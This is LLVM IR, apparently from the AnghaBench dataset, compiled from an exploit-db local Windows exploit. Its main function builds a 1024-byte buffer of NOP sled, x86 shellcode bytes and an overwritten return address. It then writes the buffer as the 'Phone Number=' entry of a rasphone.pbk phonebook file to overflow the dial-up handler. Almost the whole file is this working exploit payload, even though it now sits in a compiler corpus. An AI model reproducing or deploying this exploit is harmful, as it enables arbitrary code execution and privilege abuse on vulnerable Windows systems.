; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/windows/local/extr_19211.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/windows/local/extr_19211.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@.str = private unnamed_addr constant [3 x i8] c"%s\00", align 1
@.str.1 = private unnamed_addr constant [13 x i8] c"rasphone.pbk\00", align 1
@.str.2 = private unnamed_addr constant [2 x i8] c"w\00", align 1
@.str.3 = private unnamed_addr constant [18 x i8] c"Operation failed\0A\00", align 1
@.str.4 = private unnamed_addr constant [12 x i8] c"[Internet]\0A\00", align 1
@.str.5 = private unnamed_addr constant [14 x i8] c"Phone Number=\00", align 1
@.str.6 = private unnamed_addr constant [2 x i8] c"\0A\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main(i32 %0, i8** %1) #0 {
  %3 = alloca i32, align 4
  %4 = alloca i32, align 4
  %5 = alloca i8**, align 8
  %6 = alloca i32*, align 8
  %7 = alloca i32, align 4
  %8 = alloca [1024 x i8], align 16
  store i32 0, i32* %3, align 4
  store i32 %0, i32* %4, align 4
  store i8** %1, i8*** %5, align 8
  store i32 0, i32* %7, align 4
  br label %9

9:                                                ; preds = %12, %2
  %10 = load i32, i32* %7, align 4
  %11 = icmp slt i32 %10, 37
  br i1 %11, label %12, label %18

12:                                               ; preds = %9
  %13 = load i32, i32* %7, align 4
  %14 = sext i32 %13 to i64
  %15 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 %14
  store i8 -112, i8* %15, align 1
  %16 = load i32, i32* %7, align 4
  %17 = add nsw i32 %16, 1
  store i32 %17, i32* %7, align 4
  br label %9

18:                                               ; preds = %9
  %19 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 37
  store i8 -117, i8* %19, align 1
  %20 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 38
  store i8 -27, i8* %20, align 2
  %21 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 39
  store i8 85, i8* %21, align 1
  %22 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 40
  store i8 -117, i8* %22, align 8
  %23 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 41
  store i8 -20, i8* %23, align 1
  %24 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 42
  store i8 51, i8* %24, align 2
  %25 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 43
  store i8 -1, i8* %25, align 1
  %26 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 44
  store i8 -112, i8* %26, align 4
  %27 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 45
  store i8 87, i8* %27, align 1
  %28 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 46
  store i8 -125, i8* %28, align 2
  %29 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 47
  store i8 -20, i8* %29, align 1
  %30 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 48
  store i8 4, i8* %30, align 16
  %31 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 49
  store i8 -58, i8* %31, align 1
  %32 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 50
  store i8 69, i8* %32, align 2
  %33 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 51
  store i8 -8, i8* %33, align 1
  %34 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 52
  store i8 99, i8* %34, align 4
  %35 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 53
  store i8 -58, i8* %35, align 1
  %36 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 54
  store i8 69, i8* %36, align 2
  %37 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 55
  store i8 -7, i8* %37, align 1
  %38 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 56
  store i8 109, i8* %38, align 8
  %39 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 57
  store i8 -58, i8* %39, align 1
  %40 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 58
  store i8 69, i8* %40, align 2
  %41 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 59
  store i8 -6, i8* %41, align 1
  %42 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 60
  store i8 100, i8* %42, align 4
  %43 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 61
  store i8 -58, i8* %43, align 1
  %44 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 62
  store i8 69, i8* %44, align 2
  %45 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 63
  store i8 -5, i8* %45, align 1
  %46 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 64
  store i8 46, i8* %46, align 16
  %47 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 65
  store i8 -58, i8* %47, align 1
  %48 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 66
  store i8 69, i8* %48, align 2
  %49 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 67
  store i8 -4, i8* %49, align 1
  %50 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 68
  store i8 101, i8* %50, align 4
  %51 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 69
  store i8 -58, i8* %51, align 1
  %52 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 70
  store i8 69, i8* %52, align 2
  %53 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 71
  store i8 -3, i8* %53, align 1
  %54 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 72
  store i8 120, i8* %54, align 8
  %55 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 73
  store i8 -58, i8* %55, align 1
  %56 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 74
  store i8 69, i8* %56, align 2
  %57 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 75
  store i8 -2, i8* %57, align 1
  %58 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 76
  store i8 101, i8* %58, align 4
  %59 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 77
  store i8 -72, i8* %59, align 1
  %60 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 78
  store i8 -61, i8* %60, align 2
  %61 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 79
  store i8 8, i8* %61, align 1
  %62 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 80
  store i8 2, i8* %62, align 16
  %63 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 81
  store i8 120, i8* %63, align 1
  %64 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 82
  store i8 80, i8* %64, align 2
  %65 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 83
  store i8 -115, i8* %65, align 1
  %66 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 84
  store i8 69, i8* %66, align 4
  %67 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 85
  store i8 -8, i8* %67, align 1
  %68 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 86
  store i8 80, i8* %68, align 2
  %69 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 87
  store i8 -1, i8* %69, align 1
  %70 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 88
  store i8 85, i8* %70, align 8
  %71 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 89
  store i8 -12, i8* %71, align 1
  store i32 90, i32* %7, align 4
  br label %72

72:                                               ; preds = %75, %18
  %73 = load i32, i32* %7, align 4
  %74 = icmp slt i32 %73, 291
  br i1 %74, label %75, label %81

75:                                               ; preds = %72
  %76 = load i32, i32* %7, align 4
  %77 = sext i32 %76 to i64
  %78 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 %77
  store i8 -112, i8* %78, align 1
  %79 = load i32, i32* %7, align 4
  %80 = add nsw i32 %79, 1
  store i32 %80, i32* %7, align 4
  br label %72

81:                                               ; preds = %72
  %82 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 291
  store i8 36, i8* %82, align 1
  %83 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 292
  store i8 -15, i8* %83, align 4
  %84 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 293
  store i8 93, i8* %84, align 1
  %85 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 294
  store i8 1, i8* %85, align 2
  %86 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 295
  store i8 38, i8* %86, align 1
  %87 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 296
  store i8 -15, i8* %87, align 8
  %88 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 297
  store i8 93, i8* %88, align 1
  %89 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 298
  store i8 1, i8* %89, align 2
  %90 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 299
  store i8 0, i8* %90, align 1
  %91 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 300
  store i8 0, i8* %91, align 4
  %92 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 0
  %93 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([3 x i8], [3 x i8]* @.str, i64 0, i64 0), i8* %92)
  %94 = call i32* @fopen(i8* getelementptr inbounds ([13 x i8], [13 x i8]* @.str.1, i64 0, i64 0), i8* getelementptr inbounds ([2 x i8], [2 x i8]* @.str.2, i64 0, i64 0))
  store i32* %94, i32** %6, align 8
  %95 = load i32*, i32** %6, align 8
  %96 = icmp eq i32* %95, null
  br i1 %96, label %97, label %99

97:                                               ; preds = %81
  %98 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([18 x i8], [18 x i8]* @.str.3, i64 0, i64 0))
  store i32 0, i32* %3, align 4
  br label %110

99:                                               ; preds = %81
  %100 = load i32*, i32** %6, align 8
  %101 = call i32 (i32*, i8*, ...) @fprintf(i32* %100, i8* getelementptr inbounds ([12 x i8], [12 x i8]* @.str.4, i64 0, i64 0))
  %102 = load i32*, i32** %6, align 8
  %103 = call i32 (i32*, i8*, ...) @fprintf(i32* %102, i8* getelementptr inbounds ([14 x i8], [14 x i8]* @.str.5, i64 0, i64 0))
  %104 = load i32*, i32** %6, align 8
  %105 = getelementptr inbounds [1024 x i8], [1024 x i8]* %8, i64 0, i64 0
  %106 = call i32 (i32*, i8*, ...) @fprintf(i32* %104, i8* getelementptr inbounds ([3 x i8], [3 x i8]* @.str, i64 0, i64 0), i8* %105)
  %107 = load i32*, i32** %6, align 8
  %108 = call i32 (i32*, i8*, ...) @fprintf(i32* %107, i8* getelementptr inbounds ([2 x i8], [2 x i8]* @.str.6, i64 0, i64 0))
  br label %109

109:                                              ; preds = %99
  store i32 0, i32* %3, align 4
  br label %110

110:                                              ; preds = %109, %97
  %111 = load i32, i32* %3, align 4
  ret i32 %111
}

declare dso_local i32 @printf(i8*, ...) #1

declare dso_local i32* @fopen(i8*, i8*) #1

declare dso_local i32 @fprintf(i32*, i8*, ...) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
